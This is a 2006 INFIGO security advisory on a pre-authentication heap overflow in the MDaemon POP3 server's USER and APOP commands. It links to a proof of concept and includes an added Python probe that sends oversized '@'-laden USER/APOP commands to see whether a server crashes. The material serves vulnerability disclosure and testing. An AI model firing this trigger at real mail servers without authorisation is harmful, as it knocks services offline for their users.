INFIGO IS Security Advisory #ADV-2006-08-04
http://www.infigo.hr/

Title:              MDaemon POP3 server remote buffer overflow (preauth)
Advisory ID:        INFIGO-2006-08-04
Date:               2006-08-21
Advisory URL:       http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04
Impact:             Remote code execution (preauth)
Risk Level:         High
Vulnerability Type: Remote
Vendor Status:      Vendor contacted on 4th May 2006

==[ Overview

MDaemon Server is a standards-based SMTP/POP/IMAP mail server that offers a full range of mail server functionality. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam filters, extensive security features, and more. MDaemon can be found at http://www.altn.com/.

==[ Vulnerability

During an audit, a critical vulnerability was discovered in the MDaemon POP3 server. There is a buffer overflow in the 'USER' and 'APOP' command processing of the Altn MDaemon POP3 server. The vulnerability is triggered by supplying a long string containing '@' characters as the argument of the USER or APOP command. MDaemon processes such a string incorrectly, and a heap overflow results. Because both commands are part of the authentication dialogue, no valid credentials are needed to reach the vulnerable code.

To trigger the vulnerability, a few USER commands have to be sent to the POP3 server. Sometimes (depending on the heap state and the string length), it is even possible to redirect code execution directly into the supplied input buffer on the heap.

==[ Affected Version

The vulnerability has been identified in the latest MDaemon 8 and 9 releases. All previous versions are believed to be vulnerable as well.

==[ Fix

The vulnerability is fixed in MDaemon 9.06.

==[ PoC Exploit

The MDaemon POP3 server remote buffer overflow (preauth) PoC can be downloaded from http://www.infigo.hr/files/mdaemon_poc.pl .
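The following probe is an added example; it is not INFIGO's mdaemon_poc.pl and not MDaemon code. It reproduces the condition described in the Vulnerability section above in a checkable form: it sends a few USER (or APOP) commands whose argument is a long string with '@' characters mixed in, and reports whether the POP3 service still answers afterwards. The string length of 4096, the '@' every 16 characters, the three rounds and the placeholder APOP digest are assumptions, since the advisory gives no exact values. Run it only against a server you are authorised to test; a vulnerable build will crash or stop answering.

```python
"""Added example: POP3 USER/APOP long-argument probe for the condition
described in INFIGO-2006-08-04.  Not the advisory's mdaemon_poc.pl.
Length, '@' spacing, round count and APOP digest are assumptions."""
import socket

CRLF = b"\r\n"


def build_trigger_name(length=4096, at_every=16):
    """Build a username-like string of `length` bytes with a '@' every
    `at_every` characters.  The advisory only requires the string to be
    long and to contain '@' characters; these values are an assumption."""
    return "".join("@" if i % at_every == at_every - 1 else "A"
                   for i in range(length))


def build_user_command(name):
    """USER <name>CRLF, the RFC 1939 form of the command."""
    return b"USER " + name.encode("ascii") + CRLF


def build_apop_command(name, digest="0" * 32):
    """APOP <name> <digest>CRLF.  The digest is a placeholder 32-hex string:
    the advisory places the overflow in name handling, before any
    authentication check, so its value should not matter."""
    return b"APOP " + name.encode("ascii") + b" " + digest.encode("ascii") + CRLF


def read_line(conn, limit=1024):
    """Read one CRLF-terminated POP3 line from a socket-like object.
    Returns b"" when the peer has closed the connection, which is how a
    crashed server looks from the client side."""
    buf = b""
    while not buf.endswith(CRLF) and len(buf) < limit:
        chunk = conn.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


def probe(conn, rounds=3, length=4096, at_every=16, use_apop=False):
    """Send `rounds` oversized USER (or APOP) commands over a connected
    socket-like object.  Returns the banner, the per-round replies and
    whether the server was still answering at the end."""
    result = {"banner": read_line(conn), "replies": [], "server_alive": True}
    name = build_trigger_name(length, at_every)
    cmd = build_apop_command(name) if use_apop else build_user_command(name)
    for _ in range(rounds):
        try:
            conn.sendall(cmd)
            reply = read_line(conn)
        except OSError:
            reply = b""
        result["replies"].append(reply)
        if not reply:
            # No reply or dropped connection: the service stopped responding.
            result["server_alive"] = False
            break
    return result


def probe_host(host, port=110, **kw):
    """Connect to a POP3 server you are authorised to test and run probe()."""
    with socket.create_connection((host, port), timeout=10) as s:
        return probe(s, **kw)


class ReplayConn:
    """Socket stand-in for offline use: serves constructed `responses` in
    order, then returns b"" as a closed socket would, and records sends."""

    def __init__(self, responses):
        self.pending = b"".join(responses)
        self.sent = []

    def recv(self, n):
        chunk, self.pending = self.pending[:n], self.pending[n:]
        return chunk

    def sendall(self, data):
        self.sent.append(data)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        print(probe_host(target))
    else:
        # Offline demonstration against a constructed "healthy" server.
        fake = ReplayConn([b"+OK POP3 ready\r\n"] + [b"+OK\r\n"] * 3)
        print(probe(fake))
```

A server that keeps returning +OK (or -ERR) for all rounds is, as far as this probe can tell, not affected; a server that drops the connection after an oversized USER should be treated as vulnerable and updated to 9.06. The probe does not attempt the code-execution step the advisory mentions.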
==[ Credits

Vulnerability discovered by Sasa Jusic and Leon Juranic

==[ INFIGO IS Security Contact

INFIGO IS,
WWW    : http://www.infigo.hr
E-mail : infocus@infigo.hr